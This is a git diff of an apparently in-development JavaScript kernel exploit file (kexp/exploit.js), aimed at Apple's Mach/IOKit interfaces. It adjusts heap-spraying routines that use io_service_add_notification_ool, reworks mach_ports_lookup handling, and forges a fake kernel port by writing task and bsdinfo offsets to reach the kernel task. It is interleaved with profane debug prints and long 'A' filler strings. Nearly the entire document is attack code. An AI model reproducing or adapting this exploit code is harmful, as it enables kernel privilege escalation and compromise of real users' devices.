AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

1 files changed, 30 insertions, 44 deletions

diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 419f5c7..e854ba0 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -185,13 +185,18 @@ function spray(dict, size, port) {
 	var ret = 0;
 	var master = shit_heap(4);
 
-	host_get_io_master(mach_host_self(), master);
-	io_service_add_notification_ool(master, "IOServiceTerminate", dict, size, MACH_PORT_NULL, NULL, 0, err, port);
+	ret = host_get_io_master(mach_host_self(), master);
+	printf("yahtzee3 %d (%s) %p\n", ret, mach_error_string(ret), read_u32(master));
+//	scall("printf", "0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", master, 0x41414141, "IOServiceTerminate", 0x41414141, dict, 0x41414141, size, 0x41414141, MACH_PORT_NULL, 0x41414141, NULL, 0x41414141, 0, 0x41414141, err, 0x41414141, port, 0x41414141);
+	ret = io_service_add_notification_ool(read_u32(master), "IOServiceTerminate", dict, size, MACH_PORT_NULL, NULL, 0, err, port);
+	printf("yahtzee %d (%s)\n", ret, mach_error_string(ret));
 
 	if (ret == KERN_SUCCESS) {
 		ret = read_u32(err);
 	}
 
+	printf("yahtzee2 %d (%s)\n", ret, mach_error_string(ret));
+
 	return ret;
 }
 
@@ -370,36 +375,6 @@ function mach_ports_lookup_shit() {
 //	return 0x42603;
 }
 
-function mach_ports_lookup_shit_dealloc() {
-	printf("fuck\n");
-	var arrz = shit_heap(4);
-	printf("fuck\n");
-	write_u32(arrz, 0);
-	printf("fuck\n");
-	var sz = shit_heap(4);;
-	printf("fuck\n");
-	write_u32(sz, 3);
-	printf("fuck\n");
-//	var mts = mach_task_self();
-	printf("fuck\n");
-	calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
-	puts("helo");
-	printf("mpl success\n");
-	scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
-	printf("mpl success\n");
-
-	for (var i = 0; i < read_u32(sz); i++) {
-		if (read_u32(read_u32(arrz) + (i << 2)) != 0) {
-			printf("destroying %p\n", read_u32(read_u32(arrz) + (i << 2)));
-			mach_port_destroy(mach_task_self(), read_u32(read_u32(arrz) + (i << 2)));
-			printf("destroyed %p\n", read_u32(read_u32(arrz) + (i << 2)));
-		}
-	}
-
-	return read_u32(read_u32(arrz) + 8);
-//	return 0x42603;
-}
-
 var kernel_task_addr = 0;
 function get_kernel_task() {
 	var ret = 0;
@@ -469,18 +444,20 @@ again: while (true) {
 	sched_yield();
 	var dummy = shit_heap(4);
 	for (var i = 0; i < PORTS_NUM_PRESPRAY; i++) {
-		spray(big_buf, big_size, dummy);
+		var dummy = shit_heap(4);
+		spray(big_buf, read_u32(big_size), dummy);
 	}
 
 	sched_yield();
 	var dummy = shit_heap(4);
 	for (var i = 0; i < PORTS_NUM; i++) {
 //	for (var i = 0; i < 8; i++) {
+		var dummy = shit_heap(4);
 		if (i % 4 == 0) {
 			printf("spray_ports %d\n", i);
 		}
 		write_u32(fp + (i << 2), spray_ports(1));
-		spray(small_buf, small_size, dummy);
+		spray(small_buf, read_u32(small_size), dummy);
 	}
 
 	sched_yield();
@@ -489,15 +466,23 @@ again: while (true) {
 		release_port_ptrs(read_u32(fp + (i << 2)));
 	}
 
+//	return;
+
+
+	var arrz = shit_heap(16);
+	write_u32(arrz, 0);
+	write_u32(arrz + 4, 0);
+	write_u32(arrz + 8, 0);
+	write_u32(arrz + 12, 0);
+	var sz = shit_heap(4);
+	write_u32(sz, 3);
+//	mach_ports_lookup_shit_dealloc();
+	var ret__ = r3gister(mach_task_self(), arrz, 2, 3);
+	mach_ports_lookup(mach_task_self(), arrz, sz);
+	scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
+	printf("mpl success\n");
 
-	var arrmpt = shit_heap(16);
-	write_u32(arrmpt, 0);
-	write_u32(arrmpt + 4, 0);
-	write_u32(arrmpt + 8, 0);
-	write_u32(arrmpt + 12, 0);
-	mach_ports_lookup_shit_dealloc();
-	var ret__ = r3gister(mach_task_self(), arrmpt, 2, 3);
-	mach_ports_lookup_shit();
+	var fake_port = read_u32(read_u32(arrz) + 8);
 	printf("%d %s\n", ret__, mach_error_string(ret__));
 	printf("r3gister done\n");
 //	while (true) {
@@ -509,7 +494,7 @@ again: while (true) {
 	/*
 	 *  BEGIN JANK FUCKING HACK
 	 */
-	var fake_port = mach_ports_lookup_shit();
+//	var fake_port = mach_ports_lookup_shit();
 	printf("fuck\n");
 	printf("%x\n", fake_port);
 	printf("fuck\n");
@@ -519,7 +504,8 @@ again: while (true) {
 	printf("fuck\n");
 	write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
 	printf("fuck\n");
-	write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
+//	write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
+	write_u32(ptr, 0x73707621);
 	printf("fuck\n");
 	var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
 	printf("fuck\n");